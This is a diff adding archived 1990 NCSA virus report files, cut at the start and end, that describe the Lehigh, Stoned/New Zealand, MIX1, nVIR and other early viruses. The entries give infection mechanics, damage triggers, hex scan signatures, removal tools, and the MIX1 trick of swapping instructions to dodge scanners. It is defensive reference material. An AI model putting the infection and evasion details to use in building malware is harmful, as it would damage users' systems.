(202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa087.txt b/textfiles.com/virus/NCSA/ncsa087.txt new file mode 100644 index 00000000..063750c0 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa087.txt @@ -0,0 +1,49 @@ + Ŀ + VIRUS REPORT + Korea Virus + + +Synonyms: LBC boot. + +Date of Origin: March, 1990 + +Place of Origin: Seoul, Korea. + +Host Machine: PC compatibles. + +Host Files: boot sectors of 360K floppies. Memory resident. + +Increase in Size of Infected Files: n/a. + +Detected by: Scanv61+. + +Removed by: M-Disk, or DOS SYS command. + + In its current version, this virus does nothing but spread. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa088.txt b/textfiles.com/virus/NCSA/ncsa088.txt new file mode 100644 index 00000000..4457dd29 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa088.txt @@ -0,0 +1,133 @@ + Ŀ + VIRUS REPORT + Lehigh + + +Date of Origin: late 1987. + +Place of Origin: Lehigh University, Pennsylvania. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COMMAND.COM. + +Increase in Size of Infected Files: overwrites files. + +Nature of Damage: Corrupts program or overlay files. Overwrites the FAT +and boot sector after infecting four floppies. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, or use MDisk and replace COMMAND.COM with a clean +copy, or use F-Prot. + +Scan Code: 50 53 80 FC 4B 74 08 80 FC 4E 74 03 E9 77 01 8B DA 80 7F 01 3A +75 05 8A 07 EB 07. You can also search at offset 01CH for B4 19 CD 44 04 +61 1E 51 52 57. + +History: This is a COMMAND.COM infector that first surfaced at Lehigh +University in late 1987. It is one of the best known of viruses, and +widely discussed and analyzed. + +Description of Operation: Infects only COMMAND.COM, where it overwrites +the stack space. If a disk which contains an uninfected copy of +COMMAND.COM is accessed, that copy is also infected. A count of +infections is kept within each copy of the virus, and when this count +reaches 4, every disk (including hard disks) currently in the computer +is trashed by overwriting the initial tracks (boot sector & FAT). +Infection changes the date and time of the infected file. If a floppy +with an uninfected COMMAND.COM is write-protected, there will be a +"WRITE PROTECT ERROR" message from DOS. + + I have reprinted below the warning that Kenneth van Wyk distributed +on this virus. + + "WARNING: MS-DOS COMMAND.COM "virus" program will +reformat your disks!! + + "Last week, some of our student consultants discovered a virus +program that's been spreading rapidly throughout Lehigh University. I +thought I'd take a few minutes and warn as many of you as possible +about this program since it has the chance of spreading much farther +than just our University. We have no idea where the virus started, but +some users have told me that other universities have recently had +similar problems. + + "The virus: the virus itself is contained within the stack space of +COMMAND.COM. When a PC is booted from an infected disk, all a +user need do to spread the virus is to access another disk via TYPE, +COPY, DIR, etc. If the other disk contains COMMAND.COM, the virus +code is copied to the other disk. Then, a counter is incremented on the +parent. When this counter reaches a value of 4, any and every disk in +the PC is erased thoroughly. The boot tracks are nulled, as are the FAT +tables, etc. All Norton's horses couldn't put it back together again... :-) +This affects both floppy and hard disks. Meanwhile, the four children +that were created go on to tell four friends, and then they tell four +friends, and so on, and so on. + + "Detection: while this virus appears to be very well written, the +author did leave behind a couple footprints. First, the write date of the +COMMAND.COM changes. Second, if there's a write protect tab on an +uninfected disk, you will get a WRITE PROTECT ERROR... So, boot up +from a suspected virus'd disk and access a write protected disk - if an +error comes up, then you're sure. Note that the length of +COMMAND.COM does not get altered. + + "I urge anyone who comes in contact with publicly accessible disks +to periodically check their own disks. Also, exercise safe computing - +always wear a write protect tab. + + "This is not a joke. A large percentage of our public site disks has +been gonged by this virus in the last couple days." + + The Lehigh original virus has been sporadically reported at dozens +of installations outside of the university for over a year. It is not a +particulary successful replicator <197> probably because of the +extremely short activation fuse - and it is difficult to detect and +report because there are few symptoms prior to activation. But there +should certainly be no surprise that it's in the public domain. + + John McAfee has written: "The belief that viruses can be contained by +early counter-action is belied by the Lehigh University experience. I +have spoken to a number of individuals at the University who belived +that the virus had somehow been contained because "no copies of the +virus were distributed to outside organizations". This assumed, of +course, that the original virus writer gave up after being foiled at +Lehigh and did not insert the virus at any other location, and that all +copies of the virus at Lehigh had indeed been accounted for. The first +issue rests solely in the hands of the perpetrator and is beyond any +containment controls. The second issue relies on an error-free +containment process - allowing no possibility for overlooking, losing or +mistaking an infected diskette. In any case, the Lehigh virus was by no +means contained. I received a copy, as did virtually every virus +researcher, in mid-1988, and infection reports issued throughout the +year from universities, corporations and individual computer users." + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa089.txt b/textfiles.com/virus/NCSA/ncsa089.txt new file mode 100644 index 00000000..f0fa9ee7 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa089.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Lehigh-2 + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COMMAND.COM only. + +Increase in Size of Infected Files: overwrites files. + +Nature of Damage: Corrupts program or overlay files. Overwrites the FAT +and boot sector after infecting four floppies. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, or use MDisk and replace COMMAND.COM with a clean +copy, or use F-Prot. + +Derived from: Lehigh virus. + +Scan Code: 50 53 80 FC 4B 74 08 80 FC 4E 74 03 E9 77 01 8B DA 80 7F 01 3A +75 05 8A 07 EB 07. + + A version of the Lehigh virus modified to retain its infection +counter in RAM. After 10 infections, it corrupts the boot sector and +FATs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa090.txt b/textfiles.com/virus/NCSA/ncsa090.txt new file mode 100644 index 00000000..bfa84fdb --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa090.txt @@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Lisbon virus + + +Date of Origin: November, 1989. + +Place of Origin: Lisbon, Portugal. + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 648 bytes. + +Nature of Damage: Corrupts one out of eight COM programs by overwriting. + +Detected by: Scanv49+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Vienna + + This virus was discovered by Jean Luz, an NCSA member in Lisbon, +Portugal, in November, 1989. It infects COM files and increases the size +of infected programs by 648 bytes. It destroys 1 out of 8 infected +programs by overwriting "@AIDS" on top of the first five bytes of the +infected program. + + The virus is very similar to Vienna, except that almost every word in +the virus has been shifted 1-2 bytes in order to avoid virus +identification/detection programs which could identify the Vienna +virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa091.txt b/textfiles.com/virus/NCSA/ncsa091.txt new file mode 100644 index 00000000..c378933f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa091.txt @@ -0,0 +1,69 @@ + Ŀ + VIRUS REPORT + LodeRunner + + +Synonyms: Load Runner, Apple II GS Virus + +Date of Origin: July, 1989. + +Place of Origin: France. + +Host Machine: Apple II GS. + +Host Files: Boot block virus + +Increase in Size of Infected Files: n/a + +Nature of Damage: Erases boot blocks of disk in slot 5, drive 1. No +files are damaged. + + The damage done by this virus is minimal --it destroys only the boot +blocks of a 3.5" disk (5.25" disks and hard disks seem to be immune), +leaving all the files and directories intact (it can, however, render +some copy-protected games unusable). LOAD RUNNER has a finite life-span +built in -- at the same time it starts damaging, it also stops +propagating, and being a boot block virus, it destroys copies of itself +when it destroys the boot blocks. + + Virus copies itself to $E1/BC00 thru $E1/BFFF. Virus resides in the +boot blocks of a 3.5" disk. Copies itself to $E1/BC00 when disk is +booted. Copies itself to disk in slot 5, drive 1 when +CONTROL-APPLE-RESET is pressed. Propagation routine gains control by +patching undocumented system vector in Memory Manager. Original boot +blocks are not saved --virus contains code to emulate standard boot +process. Infects disks in slot 5, drive 1 only. Infection of disks +occurs when CONTROL-APPLE-RESET is pressed. Infection of host machine +occurs when an infected disk is booted. + + Triggered by any date between Oct. 1 and Dec. 31 inclusive, of any +year. Damage occurs when an infected disk is booted. If damage occurs, +further infection will not occur. (Note that the damage process wipes +the virus off of the infected disk.) + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa092.txt b/textfiles.com/virus/NCSA/ncsa092.txt new file mode 100644 index 00000000..f67ad444 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa092.txt @@ -0,0 +1,75 @@ + Ŀ + VIRUS REPORT + MacMag + + +Synonyms: Peace virus. + +Date of Origin: February, 1988. + +Place of Origin: Montreal, Canada. + +Host Machine: Macintosh. + + MacMag may hold the record for the virus that achieved the greatest +notoriety in the shortest period of time. Thousands of machines were +infected in less than a month! A Macintosh virus, it was planted by +Richard Brandow, publisher of MacMag, a Canadian Macintosh magazine. +The message it displayed was "Richard Brandow, publisher of MacMag, and +its entire staff would like to take the opportunity to convey their +universal message of peace to all Macintosh users around the world." The +"universal message of peace" flashed on the screens of thousands of +Macintosh owners on March 2, 1988, did no other damage, then erased its +own instructions. + + The author, Drew Davidson, "thought we'd release it and it would be +kind of neat." + + This was probably the first virus to find its way into commercial +software. Richard Brandow, a collaborator with Davidson and publisher +of a Canadian computer magazine, distributed the virus with game +software called "Mr. Potato Head" at a February, 1988 meeting of the +Montreal Macintosh users group. Marc Canter, who was speaking at the +meeting, worked for MacroMind Inc. of Chicago, a firm doing consulting +work for Aldus. He brought the game home, tried it on his Mac, then began +to review software to be shipped to Aldus. The virus infected the disk +sent to Seattle, which was reproduced. About 3,000 to 5,000 copies of an infected Aldus +Freehandteaching disk were made with a disk duplicating machine, then +shipped to computer stores around the country. Aldus recalled all of the +copies. + + MacMag can be ignored. If there is still a copy left, it will destroy +itself after displaying its message. Nevertheless, it can be detected +and killed with Disinfectant. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa093.txt b/textfiles.com/virus/NCSA/ncsa093.txt new file mode 100644 index 00000000..0cfae657 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa093.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Madonna + + +Place of Origin: Brazil. + +Host Machine: PC compatibles. + + While Madonna sings in your video, you lose your disk. Reported in +Brazil. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa094.txt b/textfiles.com/virus/NCSA/ncsa094.txt new file mode 100644 index 00000000..2d889008 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa094.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Mailson + + +Place of Origin: Brazil. + +Host Machine: PC compatibles. + + Produces an inversion of characters on the screen and and printer. +Named after a Brazilian politician. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa095.txt b/textfiles.com/virus/NCSA/ncsa095.txt new file mode 100644 index 00000000..3bec8937 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa095.txt @@ -0,0 +1,130 @@ + Ŀ + VIRUS REPORT + MIX1 + + +Synonyms: MIX/1 + +Date of Origin: First reported on August 22, 1989. + +Place of Origin: First detected in Israel. May have been written +elsewhere. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files larger than 8K only in +one version, 16K in another version. + +OnScreen Symptoms: You will see a bouncing ball after a crash, which will +occur after the sixth infection. (A variant will not crash the system.) + +Increase in Size of Infected Files: 1618 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv37+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, Virus Buster, or F-Prot. + +Derived from: Icelandic-1. + +Scan Code: "MIX1" will be the last four bytes of any infected EXE. + + MIX1 is a variant of the Icelandic-1 virus, like the Saratoga. The +Icelandic virus was first detected in June, 1989, disassembled a week +later, and the disassembly was made available around the beginning of +July. The MIX1 virus appeared on several BBSs in Israel on August 22, and +may have been written in any country, and then sent via modem to Israeli +boards. + + The virus is put at the end of the .EXE file and the header is changed +to point to the virus. Infected files can be manually identified by a +characteristic "MIX1" always being the last 4 bytes of an infected file. +Using Debug, if byte 0:33C equals 77h, then the MIX1 virus is in memory. +EXE file execution through interrupt 21h service 4bh triggers the virus. +The infected .EXE files grow by 1618-1634 bytes, depending on its +original size. It will not infect files smaller than 8K. Once an infected +program is run, the virus occupies 2,048 bytes of memory. + + Some peculiarities include: + +* All output through vectors 14h and 17h -- the serial and parallel + ports -- is garbled. + +* The NumLock key/light stays on. + +* After the 6th infection, booting may crash the computer due to a bug, + and a bouncing ball may appear on the monitor. + +* Memory allocation is done through direct MCB control. + +* It does not allocate stack space, and therefore makes some files + unusable. + +* It infects only files which are bigger than 16K, which makes + disassembly very hard. + + The modifications to Icelandic I appear to be intended to fool virus +detection programs. The changes include replacing instructions with +other equivalent ones. For example, + +XOR AX,AX + + has been replaced with: + +MOV AX,0000 + + and + +MOV ES,AX + + has been replaced with: + +PUSH AX + +POP ES + + Also, NOP instructions have been inserted in several places, +including inside the identification strings used by VIRUSCAN and most +other similar programs. This seems to be a response by virus writers to +anti-virus programs that look for infection by using identification +strings. This method has been used in the '286 variant of the Ping-Pong +virus. + + Apart from these changes, parts of the virus are almost identical to +other variants of the Icelandic virus. In the installation part, the +code to check INT 13 has been removed (as in Saratoga and Icelandic-2). + + In a variant, the infection routine has been modified to infect every +file (instead of every tenth program run), and to not infect a program +unless it is at least 16K long. A variant of the virus will not crash the +system. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa096.txt b/textfiles.com/virus/NCSA/ncsa096.txt new file mode 100644 index 00000000..a555ea40 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa096.txt @@ -0,0 +1,85 @@ + Ŀ + VIRUS REPORT + New Zealand Virus + + +Synonyms: Stoned Virus, Australian Virus, Hawaii, Marijuana, San Diego +virus, Smithsonian virus. + +Date of Origin: early 1988. + +Place of Origin: Wellington, New Zealand. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of 360K floppy disk. + +OnScreen Symptoms: The screen will sometimes display "Your PC is now +stoned!" + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Scan Code: 1E 50 80 FC 02 72 17 80 FC 04 73 12 0A D2 75 0E 33 C0 8E D8 A0 +3F 04 A8 01 75 03 E8 07 00. You can also search at offset 045H for B8 01 +02 0E 07 BB 00 02 B9 01. + +History: This virus was first reported in Wellington, New Zealand in +early 1988. + +Description of Operation: This virus consists of a boot sector only. It +infects any disk inserted in a drive after it becomes activated during a +boot, and it occupies 1K of memory. The original boot sector is held in +track zero, head one, sector three on a floppy disk, and track zero, head +zero, sector two on a hard disk. The boot sector contains two character +strings: "Your PC is now Stoned!" and "LEGALISE MARIJUANA!". The first +of these messages is only displayed one in eight times when booting from +an infected floppy, the second is unreferenced. In some variations, the +message is displayed on every 32nd boot. + + In the original version of this virus, only 360 KB 5 1/4" floppies +were infected. While the original version was unable to infect a hard +disk, other versions (such as New Zealand B) are capable of doing so. + + The virus can (unintentionally) trash 1.2 Mb floppies if they have +more than 32 files, and trashes about 5% of hard disks. + +Removal: The Stoned virus can be removed from 360KB diskettes by using +either the MDisk, CleanUp, or F-Prot programs. It can also be removed +from diskettes by using the DOS SYS command. Be sure to power down your +system and reboot from a clean, write-protected floppy prior to +attempting disinfection. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa097.txt b/textfiles.com/virus/NCSA/ncsa097.txt new file mode 100644 index 00000000..9a1d4e42 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa097.txt @@ -0,0 +1,71 @@ + Ŀ + VIRUS REPORT + New Zealand-B + + +Synonyms: Stoned-B. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of floppy disk and +partition table of hard disk. + +OnScreen Symptoms: The screen will sometimes display "Your PC is now +stoned!" + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Derived from: New Zealand. + +Scan Code: You can search at offset 043H for B8 01 02 0E 07 BB 00 02 33 +C9. + + This is a variation of New Zealand. Much of the code has been +reorganized. The only significant change in function, however, is that +the original boot sector is stored at track zero, head zero, sector seven +on a hard disk. The second string ("Legalise Marijuana!") is not +transferred when infecting a hard disk. The virus occupies space in the +hard disk's partition table. + + The hard disk is infected as soon as an infected floppy is booted. No +intentional damage is done by New Zealand-B, except systems with RLL +controllers will frequently hang. + + Removal instructions are the same as for the original New Zealand +virus for diskettes. However, an infected hard disk must be disinfected +by using MDisk with the /P parameter, with CleanUp, or NDD, because the +partition table has been infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa098.txt b/textfiles.com/virus/NCSA/ncsa098.txt new file mode 100644 index 00000000..73a7fd5d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa098.txt @@ -0,0 +1,59 @@ + Ŀ + VIRUS REPORT + New Zealand-C + + +Synonyms: Stoned-C. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of floppy disk and +partition table of hard disk. + +OnScreen Symptoms: The screen will not display any message. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Derived from: New Zealand-B + + This is the Stoned-B virus that no longer displays the "Stoned" +message. This virus is difficult to detect. + + Removal instructions are the same as for the original New Zealand +virus for diskettes. However, an infected hard disk must be disinfected +by using MDisk with the /P parameter or CleanUp, because the partition +table has been infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa099.txt b/textfiles.com/virus/NCSA/ncsa099.txt new file mode 100644 index 00000000..6eb6b37f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa099.txt @@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + New Zealand-D + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of 360K, 1.2M, and +1.44M disk. + +OnScreen Symptoms: The screen will sometimes display "Your PC is now +stoned!" + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Derived from: New Zealand (original) + +Scan Code: 1E 50 80 FC 02 72 17 80 FC 04 73 12 0A D2 75 0E 33 C0 8E D8 A0 +3F 04 A8 01 75 03 E8 07 00. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa100.txt b/textfiles.com/virus/NCSA/ncsa100.txt new file mode 100644 index 00000000..71330380 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa100.txt @@ -0,0 +1,87 @@ + Ŀ + VIRUS REPORT + nVIR + + +Host Machine: Macintosh. + + nVIR is a Macintosh virus that has now led to numerous strains, +including MEV#, AIDS, nFLU, and nVIR A and B. + + When you run an application infected with nVIR A or B on a clean +system, the infection spreads from the application to the system file. +After rebooting, the infection in turn spreads from the system to other +applications, as they are run. The effect can be devastating (see +sidebar). + + At first, nVIR A and B only replicate. When the system file is first +infected, a counter is initialized to 1000. The counter is decremented +by 1 each time the system is booted, and it is decremented by 2 each time +an infected application is run. + + When the counter reaches 0, nVIR A will sometimes either say "Don't +Panic" (if MacinTalk is installed in the system folder) or beep (if +MacinTalk is not installed in the system folder). This will happen on a +system boot with a probability of 1/16. It will also happen when an +infected application is launched with a probability of 31/256. In +addition, when an infected application is launched, nVIR A may say +"Don't Panic" twice or beep twice, with a probability of 1/256. + + When the counter reaches 0, nVIR B will sometimes beep. nVIR B does +not call MacinTalk. The beep will happen on a system boot with a +probability of 1/8. A single beep will happen when an infected +application is launched with a probability of 15/64. A double beep will +happen when an infected application is launched with a probability of +1/64. + + It is possible for nVIR A and nVIR B to mate and sexually reproduce, +resulting in new viruses combining parts of their parents. + + For example, if a system is infected with nVIR A, and if an +application infected with nVIR B is run on that 